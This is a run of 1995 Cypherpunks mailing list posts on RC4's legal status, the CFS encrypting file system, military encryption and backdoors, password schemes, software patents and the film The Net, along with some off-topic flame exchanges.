PDT Subject: RC4 Message-ID: -----BEGIN PGP SIGNED MESSAGE----- >So, does anyone know for certain if this is the true letter of the law? >Since RC4 has been reverse engineered (or leaked) to the public, do they >have any claim on it if there is no patent? Seeing the legal web that >surrounds a lot of the current crypto situation in the US, it's not >surprising that RSA would try to smoke screen everyone into thinking that >there would be a clear violation (prosecutable by law) if anyone used RC4 >without getting a license. (It's also not surprising that no one's tried >as well...) A acquaintance of mine at a now-defunct company compared the reverse engineered RC4 work-alike that was released on the net with the source they had licensed from RSADSI. She noted that the implementations were quite different (structure and variable names were both very different), so the work-alike released on the net was indeed most likely reverse engineered. Someone else queried two or three other BSAFE source licensees, and found all agreed that the code was not cribbed from BSAFE sources. Sadly, I no longer have copies of the (anonymous) post. Still, I'm not rich enough to punch through RSADSI's smoke screen... Richard -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMBky1fobez3wRbTBAQHh2AP/dPCZxvp8W2CXG/mqN7iuYc1oH+t0XiH8 wAnNQ2+0BbWzVyzt3YalUp6/JPXDBm1kGVWxmy+UUY8y0dfYpsi78T4aQxoPpG13 Kfc7MQat77SGvhRzNAcMei0h+hyMUmwGqnaetuSGIbFcyPbcnn4F8nq8JBOHXHcF 03+m959OKVk= =wTxS -----END PGP SIGNATURE----- From usura at replay.com Fri Jul 28 17:15:31 1995 From: usura at replay.com (Alex de Joode) Date: Fri, 28 Jul 95 17:15:31 PDT Subject: New release (v1.3) of CFS Unix encrypting file system now available Message-ID: <199507290015.AA12526@xs1.xs4all.nl> Matt Blaze sez: : Source code for the latest version (release 1.3) of CFS, the Cryptographic : File System, is now available upon request for research and experimental : use in the US and Canada. [..] : If you would like a copy of the CFS source code, please read to the end : of this message and then send email to: : cfs at research.att.com : DO NOT REPLY DIRECTLY TO THIS MESSAGE. You must include a statement : that you are in the US or Canada, are a citizen or legal permanent : resident of the US or Canada, and have read and understand the license : conditions stated above. Be sure to include an email address in a US- : or Canada-registered domain. The code will be sent to you via email in : a "shar" shell archive (a little over 300K bytes long). Now, this would be very handy, unfortunately I'm no American or Canadian. -- Alex de Joode Fear Uncertainty and Doubt, Inc. From altitude at cic.net Fri Jul 28 17:41:06 1995 From: altitude at cic.net (Alex Tang) Date: Fri, 28 Jul 95 17:41:06 PDT Subject: your mail In-Reply-To: Message-ID: <199507290040.UAA26790@petrified.cic.net> On Fri Jul 28 18:24:16 1995: you scribbled... > > The answer is to have some non-USA entity build shareable full fledged > full powered crypto libraries and provide them for free for the rest of > the world and for all machines. Wouldn't there still be licensing issues to deal with (in the states at least)?? I'm sure RSA would claim that the package would be in violation of the licensing... (this doesn't mean i'm not all for it. I only wish i was outside of the states to help... :( ...alex... Alex Tang altitude at cic.net http://petrified.cic.net/~altitude CICNet: Unix Support / InfoSystems Services / WebMaster / Programmer Viz-It!: Software Developer (Check out http://vizit.cic.net) UM-ITD: TaX.500 Developer (Check out http://petrified.cic.net/tax500) From mimir at io.com Fri Jul 28 18:09:05 1995 From: mimir at io.com (Al Billings) Date: Fri, 28 Jul 95 18:09:05 PDT Subject: Word cracking Message-ID: <199507290108.AA18206@relay.interserv.com> I have a Microsoft Word document that is encrypted in some fashion. Does anyone know of any utilities to crack whatever Encryption is in Word 6.0? From cellf at free.org Fri Jul 28 20:32:04 1995 From: cellf at free.org (jon cameron) Date: Fri, 28 Jul 95 20:32:04 PDT Subject: PS/2 passwd bypassed at bootup? In-Reply-To: <199507290120.VAA01748@gmerin.dialup.access.net> Message-ID: On Fri, 28 Jul 1995, Gary Merinstein wrote: > > I have my crummy IBM PS/2 passwd protected upon turning it on. > > I know that removing the battery in a PS/2 deletes the password. > > But can it be bypassed by an MIS-type if that person has an > > administration-type of diagnostic/setup/boot-up floppy? > > > > Jon C. > > > > when you type the power-on passwd, adding a slash to the end of it should > delete it for future power-ons: > > passwd/new-passwd changes password > passwd/ removes password (actually it changes it to the > null string. > > if you remove the password, you will then need the setup disk if you want to > re-install the power-on password. > I understand how that works, but how did the admin-dude bypass my passwd (a combo of six letters/numbers only known to me)? My log file says that he only made one attempt at getting in. Can CMOS store my passwd AND perhaps an admin passwd established in CMOS before I received the crummy PS/2? Is it encrypted? Do CMOSes in general encrypt their passwds ==> can code be added where the passwd is stored? How much space is in the "memory" of CMOS? Thanks for all the replies... Jon C. From joelm at eskimo.com Sat Jul 29 00:04:05 1995 From: joelm at eskimo.com (Joel McNamara) Date: Sat, 29 Jul 95 00:04:05 PDT Subject: The Net (short movie review) Message-ID: <199507290703.AAA06086@mail.eskimo.com> Don't bother. Better to wait until it hits the video shelves then have a party and see who can find the most (of many) technical flaws and gaffs. Would be much more entertaining in that context. No crypto or standard Cypherpunk discussion topics (more hacker related with security software trapdoors, cell phone eavesdropping, general hacker mischief, and corporate conspiracies). Mostly a chase movie with computers and the Internet thrown in to differentiate it from your typical ho-hum flick of this genre. Poor character development, predictable plot, and hokey effects (my wife kept elbowing me because I was the only one in the theater laughing at certain parts). Your standard, computer illiterate citizen will further be mislead on the potential evils of computers. Fortunately, no four horseman stuff. (Would be interesting to find some willing Hollywood type and script an accurate flick with a crypto good-guy/gal to promote the cause). Buying a couple of magazines at the Barnes and Noble next to the theater would have definitely been a better entertainment value. Joel McNamara joelm at eskimo.com - http://www.eskimo.com/~joelm for PGP key From tcmay at sensemedia.net Sat Jul 29 00:36:36 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Sat, 29 Jul 95 00:36:36 PDT Subject: Military Prisons for Citizen-Units Message-ID: At 5:42 PM 7/28/95, Brian Davis wrote: >The military is not authorized to listen in to any phone calls they want >to hear. Otherwise, everyone on the list, including me, would probably >be in some hidden military prison. > >:-) for the humor-impaired. This is not so. The military _did_ put me in one of their hidden military prisons, but decided I would be more useful on the Cypherpunks list. I recognize several other names here from my work brigade. --Citizen-Unit Tim "The Zek" May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From nobody at valhalla.phoenix.net Sat Jul 29 01:15:49 1995 From: nobody at valhalla.phoenix.net (Anonymous) Date: Sat, 29 Jul 95 01:15:49 PDT Subject: Hello.public mixmaster access Message-ID: <199507290815.DAA01637@ valhalla.phoenix.net> would some kind soul make available MIXMASTER client thru telnet???? of course less security but Some of us dont have Unix Access So it would Help!! as long as Reasonable Care is Taken it should be Safe Enuff?for Most uses? Making Client default shell For a Guest User would be Easy and Safe!and Client stay on That Host so No Exporting Done!so Someone Please!! 10x all!! From nobody at valhalla.phoenix.net Sat Jul 29 02:05:26 1995 From: nobody at valhalla.phoenix.net (Anonymous) Date: Sat, 29 Jul 95 02:05:26 PDT Subject: First Virtual, Nathaniel Boorenstein Message-ID: <199507290905.EAA01962@ valhalla.phoenix.net> Mr. Borenstein's text production rate is truly amazing. We should induct him into the Internet Hall-of-Fame immediately. He rivals Kibo in his ability to detect messages about himself or his company. He rivals Sternlight in his ability to generate endless streams of minor points. Crypto-relevance: 1) What technique could be used to differentiate Boorenstein's rants from automatic rant generator output? Has First Virtual done this? If someone wanted to generate a Borenstein rant-generator, god knows that there's enough low-entropy sample material out there. 2) If you're looking for keywords to insert into your M-x spook-the-spooks generator, try Borenstein and First Virtual. From don at cs.byu.edu Sat Jul 29 02:18:11 1995 From: don at cs.byu.edu (Donald M. Kitchen) Date: Sat, 29 Jul 95 02:18:11 PDT Subject: now! Grabbe, X, re. Foster, NSA, BCCI, etc. In-Reply-To: <199507282206.SAA11720@panix4.panix.com> Message-ID: <199507290917.DAA11439@bert.cs.byu.edu> Perry: > This is cypherpunks, a mailing list for people interested in > cryptography and its social implications. This is not "Conspiracy > Buffs Digest: All The Silly Conspiracy Theories You Can Read". > > Please take the noise postings elsewhere. I am very much in agreement. I am not interested in reading this stuff in the cpunks mail list. Here is what I consider to be acceptable ways to send this stuff to the people on cpunks: 1) NOT AT ALL 2) A pointer and explaination. For example: "Hey, there is an article that describes the Foster case, which also includes proof that the NSA [something relevant to cpunks] and it's on alt.kooks.conspiracy posted by John Spook, msg id 3) A summary of the parts relevant to cpunks. For example: "A recent 50-page NYT book on whitewater mentions that Hubbard used Nautilus to talk over the phone with Ms. Clinton" In the past, method 3 (summarizing) has proven very effective for some newspaper articles on things. Don Note: this is not meant to release me from guilt of having posted off-topic and innane things in the past (and future), but at least I did so with little bandwidth. From don at cs.byu.edu Sat Jul 29 02:26:22 1995 From: don at cs.byu.edu (Donald M. Kitchen) Date: Sat, 29 Jul 95 02:26:22 PDT Subject: First Virtual, Nathaniel Boorenstein In-Reply-To: <199507290905.EAA01962@ valhalla.phoenix.net> Message-ID: <199507290925.DAA11537@bert.cs.byu.edu> Anonymous: > Mr. Borenstein's text production rate is truly amazing. We should > induct him into the Internet Hall-of-Fame immediately. > > He rivals Kibo in his ability to detect messages about himself or his > company. He rivals Sternlight in his ability to generate endless > streams of minor points. This whole thread has me wondering what "ELL DEE" is up to these days. Ooops, I think I just added another msg to the thread. Good thing it's not signed, I'll deny I sent it. In order to give this message an ObCrypto, might I mention that we actually had some traffic on the #crypto/#cpunks channels recently. No alt.conspiracy or rant-o-matics either!! Don From enzo at ima.com Sat Jul 29 02:58:56 1995 From: enzo at ima.com (Enzo Michelangeli) Date: Sat, 29 Jul 95 02:58:56 PDT Subject: More about HTTP proxying: Harvest cache Message-ID: Hal and others interested in HTTP proxying: I've just found an interesting alternative to CERN httpd at http://excalibur.usc.edu/ . I haven't yet played with it, but it looks promising. Caching should also play a useful role defeating traffic analysis, besides increasing the throughput. [...] HIERARCHY The Harvest cache implements hierarchical caching: your cache at home can resolve URLs through your lab cache, which in turn can resolve requests through your institutional cache, which in turn can resolve requests through your regional network cache. The cache resolution algorithm, at each stage in the hierarchy, distinguishes parents from neighbor caches. A parent cache is a cache higher up the hierarchy, while a neighbor cache is one at the same level in the hierarchy. [...] From carolab at censored.org Sat Jul 29 03:00:55 1995 From: carolab at censored.org (Censored Girls Anonymous) Date: Sat, 29 Jul 95 03:00:55 PDT Subject: Sat phone permit "wire"taps In-Reply-To: Message-ID: I've been arrested too amy times, an done enough local, state, and federal time to know. If THEY want it, THEY will GET IT. Consitiution or no. Just like most of us here. And....if ya can't get it right away, ya keep hacking at it until YA DO GET IT. It's really that simple. They do it, we do it. The satellites are no different than anything else. Next case........ Love Always, Carol Anne On Fri, 28 Jul 1995, Brian Davis wrote: > On Thu, 27 Jul 1995, Phil Fraering wrote: > > From: Ted_Anderson at transarc.com > > I found these paragraphs in a recent Space News interesting. They were > > at the end of an article titled "Military Officials Open To Using > > Civilian Links" in the July 3rd issue. > > "Iridium, Globalstar, Inmarsat-P and Odyssey all plan to include > > features to permit authorized eavesdropping, officials said. > Did you miss this word? While I suspect that you don't like Title III > wiretaps, they are legal at present. The above contemplates legal > wiretaps on some phone service that might otherwise be outside the reach > of legal wiretaps. > > It's a pity that the military has decided that in its zeal to listen > > in on phone calls, that national security is an expendable asset. > The military is not authorized to listen in to any phone calls they want > to hear. Otherwise, everyone on the list, including me, would probably > be in some hidden military prison. > > :-) for the humor-impaired. Member Internet Society - Certified BETSI Programmer - WWW Page Creation ------------------------------------------------------------------------- Carol Anne Braddock <--now running linux 1.0.9 for your pleasure carolann at censored.org __ __ ____ ___ ___ ____ carolab at primenet.com /__)/__) / / / / /_ /\ / /_ / carolb at spring.com / / \ / / / / /__ / \/ /___ / ------------------------------------------------------------------------- A great place to start My Cyber Doc... From aba at dcs.exeter.ac.uk Sat Jul 29 04:10:59 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Sat, 29 Jul 95 04:10:59 PDT Subject: Zimmerman legal fund Message-ID: <19336.9507291110@exe.dcs.exeter.ac.uk> Nathaniel Borenstein writes on cpunks: > The relationship is a completely open and friendly one, Not intending to infer otherwise (indeed I think I said this). > without any strings attached that I'm aware of. > [...] > So, FV has been a friend of Phil's for a long time. We launched the > Yellow Ribbon campaign and the FV-based fundraising drive in that > spirit, though clearly it doesn't exactly hurt us if people sign up > for FV in order to donate to Phil. That really wasn't our > motivation, however, and we sought to underscore that fact by making > a donation to Phil's defense fund every time people sign up for a > new account expressly in order to donate to ZLDF. In other words, > if you are a Zimmerman supporter and you were thinking it might be > nice to have an FV account anyway, you can help Phil even more by > signing up and paying your $2 fee through the ZLDF pages. Okay so far so good. Sounds good for Phil Z which sounds cool to me. > Well, only on the cypherpunks list would you be likely to find > general agreement that PGP'ed credit card numbers are "easier" than > First Virtual. Many thousands of extremely naive net citizens are > now happy FV customers, and I seriously doubt that most of them > could master PGP without a full-day tutorial. (We're not talking > about rocket scientists here, folks.) I dunno you know... sci.crypt, alt.security.pgp, alt.privacy,anon-server, etc, etc. are I think the most common people to be using the yellow-ribbon sig, and hence the places they post to (mainly the same) are likely to be the people who see, it and are hence likely to contribute. The URL being used is http://www.netresponse.com/zldf, and nowhere does it mention using PGP and CC #'s. Most people who can't use PGP aren't going to be interested I would have thought. When I read the URL I thought, hmm, okay, got fired up and thought I'd donate something right then... but when it came to it, I had to sign up for a fv account. I cooled. It has to be instant, for best effect. > There are two web sites basically because they are taking care of > the informational aspects and we're concentrating (pro bono) on the > online fundraising aspects. If www.netresponse.com is someone else (although you did say you started the Yello Ribbon campaign), I guess the comments are directed to them rather than you, as if your link is just "the FV method to donate to the PZLDF", then fair enough. Maybe I should try target at the zldf at clark.net email. (I think there is a human one if I remember rightly. Also note that this was _not_ an attack on FV, but rather a plea to improve the amount of money the yellow ribbon campaign draws for the PZLDF, by providing alternatives which will suit some people better for a one-off, instant payment). > If we've overly stressed FV as a collection mechanism, I apologize, > but you must bear in mind that we've been living and breathing the > FV payment system for 18 months now, and it would be kind of hard > for us not to even *mention* it. :-) Okay, now separate issue, really talking about FV now. For me, the main thing holding me back from using it is that I'm not in the US, and don't have a US bank account to open a FV seller acct. (I would have liked to use it as one of the few net payment systems actually up and running, as a payment method for the RSA T-shirts, it would have been a nice system, allowing me to effectively accept VISA payments which I have otherwise been unable to do.) Any news on this front? Last I looked on your WWW page, you were investigating this and payments in other currencies. US$ would be fine though, as long as it was possible for the seller to create a US account, or have it paid to a non-US account (would it not be possible to pay to non-US account?). Adam -- HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/ --rsa--------------------------8<------------------------------- #!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL $m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa 2/d0 Forwarded message: >From fc Sat Jul 29 07:18:30 1995 Subject: NO reasno whatsoever for the MILITARY to use an intentionally WEAK encryption system. To: pgf at tyrell.net (Phil Fraering) Date: Sat, 29 Jul 1995 07:18:30 -0400 (EDT) In-Reply-To: <199507282019.AA27619 at tyrell.net> from "Phil Fraering" at Jul 28, 95 03:19:45 pm X-Mailer: ELM [version 2.4 PL22] Content-Type: text Content-Length: 3694 ... > You misunderstand. With public key encryption, the proliferation of processor > power and bandwidth, and their funding, there is NO reason whatsoever for the > MILITARY to use an intentionally WEAK encryption system. The military doesn't have that much funding for this sort of thing. There are more than 2.5 million computers (est.) in the DoD, and to put in and manage a cryptosystem for this large a network is a very difficult and expensive proposition. At $100 per computer (including only purchase price and installation) that's $250 million, but that only covers relatively low bandwidth communications. The vast majority of systems use Ethernets and similar things where encryption is far more expensive - but we'll ignore that for now. You also have the key management problem. You need to create a secure distributed key management database capable of handling 2.5 million public keys. No current system I am aware of can do this, so there is a substantial R+D problem out there. Then we have to put hooks into every different OS used in the DoD to allow this to work properly. Then we have issues like synchorinization and man-in-the-middle attacks to worry about. Any of these could take out the crypto-systems, which are (in today's world) less reliable than standard communications. This means we are sacrificing availability for confidentiality, which in the military domain means we will lose the war, but nobody will be able to tell us why, because they will never be able to decrypt all the details. The DoD does use cryptography extensively, but only to protect information worthy of the real costs and complexities associated with the technology - just as any organization should strive to do. ... > I think you misunderstood: if we want a military in the first place > (yes, I realize that's an open question to many people on this list) > it needs to have as much of its communications encrypted as possible. > Without back doors or intentionally weakened algorithms. Otherwise > we're just stuck with a standard conventional force that isn't _that_ > great compared to the combined assets of a reasonable assembly of > enemy forces. Secrecy isn't the only military advantage in information warfare. The pace of the action is far more important, the availability of select information at the right place at the right time is far more important, the ability to deny information to the enemy is far more important, the accuracy and timeliness of the information is far more important, and on and on. If you really want to know more about this, you should read: "Protection and Security on the Information Superhighway" John Wiley and Sons, 1995 ISBN 0-471-11389-1, 320 pp, $24.95 Furthermore, backdoors are very useful, for example, when we sell the equipment to other nations who resell them to those who try to use the techynology against us. The best cryptosystem for the NSA is one that only they can break. > I would go even farther: since so many of the troops sent over to the Gulf > in the war there went with K-Mart-purchased GPS receivers that the military > had to turn off selective availability, I am willing to bet that in future > conflicts the U.S. soldier's ability to have secure communications (with > no backdoors or weakened algorithms) is dependent on civilians having access > to the same technology. Because the only way they might have it is if Ma > and Pa go down to the local K-Mart and buy one for their son/daughter about > to go overseas. How much would you like to make that bet for? -- -> See: Info-Sec Heaven at URL http://all.net Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 -- -> See: Info-Sec Heaven at URL http://all.net Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From alanh at infi.net Sat Jul 29 07:19:04 1995 From: alanh at infi.net (Alan Horowitz) Date: Sat, 29 Jul 95 07:19:04 PDT Subject: NO reasno whatsoever for the MILITARY to use an intentionally WEAK encryption system. (fwd) In-Reply-To: <9507291131.AA18987@all.net> Message-ID: > The DoD does use cryptography extensively, but only to protect > information worthy of the real costs and complexities Another interlocutor whose knowledge of military traffic comes from watching Hollywood movies/TV shows. Or, maybe he even has access to high-level briefings - and believes everything that is said. Doc, you might find it instructive to spend a tour in the real world of the military. From rah at shipwright.com Sat Jul 29 07:33:17 1995 From: rah at shipwright.com (Robert Hettinga) Date: Sat, 29 Jul 95 07:33:17 PDT Subject: The Net (short movie review) Message-ID: At 3:04 AM 7/29/95, Joel McNamara wrote: >Don't bother. Better to wait until it hits the video shelves then have a >party and see who can find the most (of many) technical flaws and gaffs. >Would be much more entertaining in that context. Agreed. In television interviews Ms. Bullock talks about how she's "on the net all the time" while in further conversation it's clear that all she does is hang out in AOL auditoria and chat-rooms, probably with some net.flack at her elbow.... Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From perry at panix.com Sat Jul 29 08:07:20 1995 From: perry at panix.com (Perry E. Metzger) Date: Sat, 29 Jul 95 08:07:20 PDT Subject: First Virtual, Nathaniel Boorenstein In-Reply-To: <199507290905.EAA01962@ valhalla.phoenix.net> Message-ID: <199507291507.LAA01789@panix4.panix.com> Anonymous Asshole writes: > Mr. Borenstein's text production rate is truly amazing. We should > induct him into the Internet Hall-of-Fame immediately. god, you're a clueless jerk, whomever you are. What's Nat done to you? .pm From fc at all.net Sat Jul 29 08:41:42 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Sat, 29 Jul 95 08:41:42 PDT Subject: what the military does and why (re: cryptography) In-Reply-To: Message-ID: <9507291535.AA04463@all.net> > > The DoD does use cryptography extensively, but only to protect > > information worthy of the real costs and complexities > > Another interlocutor whose knowledge of military traffic comes from > watching Hollywood movies/TV shows. Or, maybe he even has access to > high-level briefings - and believes everything that is said. > > Doc, you might find it instructive to spend a tour in the real world > of the military. Perhaps if you reviewed the material on which my comments are based, you would have a different opinion, and perhaps not, but to make your comment based on an apparent lack of knowledge of the basis for my opinions indicates both a lack of willingness to spend the necessary effort checking before you make such statements and a lack of desire to engage in more than rank speculation. To get an idea of the basis for my comments, you might start by reading some of my writings and look through the citations I use as a basis for my opinions. If you would like a reading list, look under Management Analytics in my W3 site: -- -> See: Info-Sec Heaven at URL http://all.net Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From crypto at shaq.midex.com Sat Jul 29 09:02:14 1995 From: crypto at shaq.midex.com (Crypto Defender) Date: Sat, 29 Jul 95 09:02:14 PDT Subject: Legal Crypto Bullshit and Lawyers reluctance Message-ID: Actually I am a lawyer...hehe... With the recent talk and action regarding the hooks for crypto in certain very valuable (or at least of increasing value) programs available on the net and elsewhere I find myself getting increasingly angry about the discourse and especially the arrogance of the parties involved. As a lawyer, I often send demand letters first in cases where the chances of winning a case in court are small and the ability for my client to withstand extended billing is low. In short, I send these letters as a weak effort backed up by little intent on pursuing the case (NOTE: I did not say no intent, I often do pursue cases with little or no money in them, and that explains why my school loans are not paid off 8-). What I am saying is that these demand letters that are being sent, especially regarding tenuous positions such as programs with crypto hooks are ITAR restricted, are causing more damage then they need to. I am not suggesting that Wei distribute his libraries and bare the brunt of prosecution. But I am certain there are bigger institutional players out there that can. I can not say we would take the case without obviously speaking with our management committee at my firm, but we often take on cases that will lose us money if they break into new areas of the law. Someone must be on this list whom in good faith, honestly believes that the ITAR restrictions dont apply to every piece of software on the net. While I can not and am not advocating breaking the law, nor am I soliciting business because I am sending to a general email list, If someone is interested in a challenge other than Phil Zimmerman's let me know. I also will not pursue anything without the relevant author's permission, obviously. I am not intending to get people in trouble here. I just feel that their stance on the law is weak at best and feel there has to be someone out there willing to take the chance. Matt Miszewski Attorney at Law matt at midex.com From monty.harder at famend.com Sat Jul 29 09:16:20 1995 From: monty.harder at famend.com (MONTY HARDER) Date: Sat, 29 Jul 95 09:16:20 PDT Subject: Universal Password System? Message-ID: <8AE21FE.0003000281.uuout@famend.com> I was thinking some more (look out, this could be dangerous) about the concept of using some kind of H(challenge+password) system to keep passwords away from ____(your threat model here)____, when it hit me that we could devise a standard password system, which would allow Joe Schmoe to have a single password for all of his interactions with puters. Ideally, Joe would need a "smart card" or PDA with IR link (this could even be the proverbial Windows Watch) that would not need to keep the actual passphrase at all (but would insure against a compromised system recording keystrokes) that would keep the pubkeys of all systems with which he has accounts. It would also need to be able to display in decimal and hex for systems without the IR link. When he is making connections to a new system, the system will give him its S and RSA or other public key K, so that the smart card can compute K( H(S+P) ), and send that as the password. To the system, Q = K"( K( H(S+P) ) ) =is= the password, but Joe only needs to remember P for everything. From then on, logons will include the system sending S and a non-reproducible challenge (where C is iterated less-frequently and D is time.of.day) and the smart card responding with K( H( D + H(C+Q) ) ). As you may recall, the idea of the multi-part challenge was so as to allow the admin of the system to store Q remotely, and keep C -of-the-day and H(C+Q) for each user on the system itself. With appropriate safeguards (a physical switch on the case of the system which kills the NVRAM chip with the key for the secure file system, this would seem to be Pretty Secure. The system is extensible, allowing further nesting of challenge parts within the hash/concatenation function, so that layers of security can be used, if anyone can find an application for them. The basic principle of the master passphrase for all uses would make it easier to get Joe to use one that he can remember, without giving up anything to corrupt administrators (I have a hell of a time remembering all the passwords for every system, and must let the comm program remember them, protecting it with another password. Messy.) Comments? * Tribble: * Punk Tribble: Y Tribble Contortionist: & --- * Monster at FAmend.Com * From mnorton at cavern.uark.edu Sat Jul 29 09:18:08 1995 From: mnorton at cavern.uark.edu (Mac Norton) Date: Sat, 29 Jul 95 09:18:08 PDT Subject: now! Grabbe, X, re. Foster, NSA, BCCI, etc. In-Reply-To: Message-ID: Let's see: Chapter X of this serial features Clark Clifford, Nixon, Noriega, Robert Wagner (but not Natalie Wood), Bill Clinton as CIA agent in London, billionaire sheiks, the Medellin and Cali cartels, Cap Weinberger, Bob Dole, the Mossad, BCCI, Jack Stephens, Barry Seals, drug deals, money laundering, clandestine air strips, the Contras, Oliver North, nuclear weapons, the Committee Of 30, Bert Lance, the Rose Law Firm, a suspiciously dead investigative reporter, and aliens from UFOs.... No, wait--no aliens yet! Do we get the aliens in Chapter XI, at last? I keep waiting for the aliens, send in the aliens, there ought to be aliens... MacN > ---------- Forwarded message ---------- > Date: Fri, 28 Jul 1995 15:49:28 -0400 (EDT) > From: KALLISTE at delphi.com > To: bdolan at use.usit.net > Subject: Part X: Allegations re Vince Foster, the NSA, and Bank Spying > > -----BEGIN PGP SIGNED MESSAGE----- > > Allegations Regarding Vince Foster, the NSA, and > Banking Transactions Spying, Part X > > by J. Orlin Grabbe > > *********************************************************************** > > What do nuclear weapons, money laundering, covert operations, > money management, clandestine payments of payola and kickbacks, and the > systematic monitoring of bank loans and bank wire transfers have in common? > > The answer begins with BCCI: the Bank of Credit and Commerce > International. BCCI connects the Israeli bomb to the Pakistani bomb to > suppliers of banking software like Systematics, and to a very dead money > launderer named Vince Foster. From AlanPugh at MAILSRV2.PCY.MCI.NET Sat Jul 29 10:15:39 1995 From: AlanPugh at MAILSRV2.PCY.MCI.NET (Alan Pugh) Date: Sat, 29 Jul 95 10:15:39 PDT Subject: copyrighting algorithms Message-ID: <01HTFZ8S12128WWGGL@MAILSRV1.PCY.MCI.NET> -----BEGIN PGP SIGNED MESSAGE----- Date sent: Thu, 27 Jul 1995 21:43:07 -0700 From: Bill Trost Subject: copyrighting algorithms To: Wolfgang Roeckelein Copies to: rross at sci.dixie.edu (Russell Ross), ssl-talk at netscape.com, cypherpunks at toad.com Wolfgang Roeckelein writes: >I wasn't aware that you could copyright an algorithm. Patent, >yes, but not copyright. Intellectual property meens secret, >right? Aren't there any precendence cases involving propriety >schemes that are reverse engineered? =snipped= bt> As for the quoted material, "Intellectual property meens [sic] bt> secret" is quite mistaken. Copyright and patents are the two most bt> common forms of intellectual property (AFAIK), and neither of them are bt> secret (unless they're classified patents, but never mind...). from _computer_digest_ (raleigh,nc edition) august 1995... "In the past, the office (U.S. Patent Office) has contended that because software is a mathematical process, it can only be - -protected- and not -patented- by copyright law. However, the U.S. Court of Appeals for the D.C. Circuit has ruled in several recent cases that inventors deserve patents because the programming was integral to the machine." ... The office announced in March that it would propose new rules for embedded software patents and published them in the June 2 Federal Register..." Spokesman Richard Maulsby said the agency hopes to have final quidelines in place by September. Under law, the office issues patents for 'machines', 'articles of manufacture' and 'processes'. The proposed rules tell patent examiners how to determine whether software proposed for patenting meets the criteria. Under the proposed rules: 'A computer or other programmable apparatus whose actions are directed by a computer program or other form of software is a statutory "machine". A computer-readable memory that can be used to direct a computer to function in a particular manner when used by the computer is a statutory "article of manufacture". A series of specific operational steps to be performed on or with the aid of a computer is a statutory "process." What isn't patentable? According to the rules: 'A compilation or arrangement of data independent of any physical element,' meaning no hardware. ... The guidelines are available on the patent office's World Wide Web server at http://www.uspto.gov. The patent office is accepting comments on the proposed guidelines through July 31. ... Comments can ... be sent by Internet electronic mail to: comments-softwarepro.gov. ============================= obcrypto: would this give any more ammunition to companies like rsa in protecting their algorythm? amp <0003701548 at mcimail.com> PGP Key = 4A2683C1 July 29, 1995 12:35 -----BEGIN PGP SIGNATURE----- Version: 2.61 iQEVAwUBMBo5NigP1O9KJoPBAQG53wf/e1/gO4BxqZ1DTEv6/XQ13amQtQ9iKnr6 tgQJ37XwwR45fd87X+du68yDVjFZSKp6A27PCtfxkGmi8v0gHdGYKenaWnv4CWs7 KhP+7f/ZyVND5oYd4HEMDnVJCVsRA2Kd1BaXbFlxmp+URH9XZkr0aOdvtOqngyCA qgpQ8jD4duu1HwwHQyj47mxgkncEfN1H5mAFyaLA+Lgx6yhvaZqedzMZokGkqOPR bZMKhodYhOatmtyEwxciS2sqj3DYq7w+XC57sSSz+raOEmDhfq8/UNctJ6+d4vuH PWk26vbfxMAKKzsq5VRwf3XvAjvT4ky+KJgCDaFezmBa2dXvw/K+Lw== =SNY7 -----END PGP SIGNATURE----- ********************************************* * / Only God can see the whole * * O[%\%\%{<>===========================- * * \ Mandlebrot Set at Once! * * amp * * <0003701548 at mcimail.com> * * * ********************************************* Key fingerprint = A7 97 70 0F E2 5B 95 7C DB 7C 2B BF 0F E1 69 1D From alanh at infi.net Sat Jul 29 10:24:47 1995 From: alanh at infi.net (Alan Horowitz) Date: Sat, 29 Jul 95 10:24:47 PDT Subject: what the military does and why (re: cryptography) In-Reply-To: <9507291535.AA04463@all.net> Message-ID: On Sat, 29 Jul 1995, Dr. Frederick B. Cohen wrote: > some of my writings and look through the citations I use as a basis for > my opinions. If you would like a reading list, look under Management > Analytics in my W3 site: Doc, how much actual workaday classified traffic have you laid eyes upon? Never seen a E-2's orders to alcohol-rehabilitation school classified Top Secret? Never seen extracts from Janes _Ships of the World_ classified as Secret? Management Analytics. That's what the world needs. From fc at all.net Sat Jul 29 10:43:24 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Sat, 29 Jul 95 10:43:24 PDT Subject: what the military does and why (re: cryptography) In-Reply-To: Message-ID: <9507291737.AA12037@all.net> > Doc, how much actual workaday classified traffic have you laid eyes upon? I could tell you, but then I'd have to shoot you. > Never seen a E-2's orders to alcohol-rehabilitation school classified Top > Secret? > Never seen extracts from Janes _Ships of the World_ classified as > Secret? Just because you don't know why they are classified that way doesn't make the classifications invalid, and furthermore, I don't recall saying that the DoD is perfect. What I said was that they can't cost effectively encrypt all information and that they also have requirements that may make cryptography inapporpriate in certain circumstances, so they have policies and perform risk analysis on what to spend money protecting with cryptography. > > Management Analytics. That's what the world needs. > Even a monkey eventually types truly wise statements given enough time. -- -> See: Info-Sec Heaven at URL http://all.net Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From prz at acm.org Sat Jul 29 11:15:27 1995 From: prz at acm.org (Philip Zimmermann) Date: Sat, 29 Jul 95 11:15:27 PDT Subject: The little sex kitten Message-ID: <199507291757.RAA10336@maalox> I don't know if this item has been posted here yet, but someone just emailed it to me, and I thought you folks might enjoy it. -prz ---- Date: Thu, 27 Jul 1995 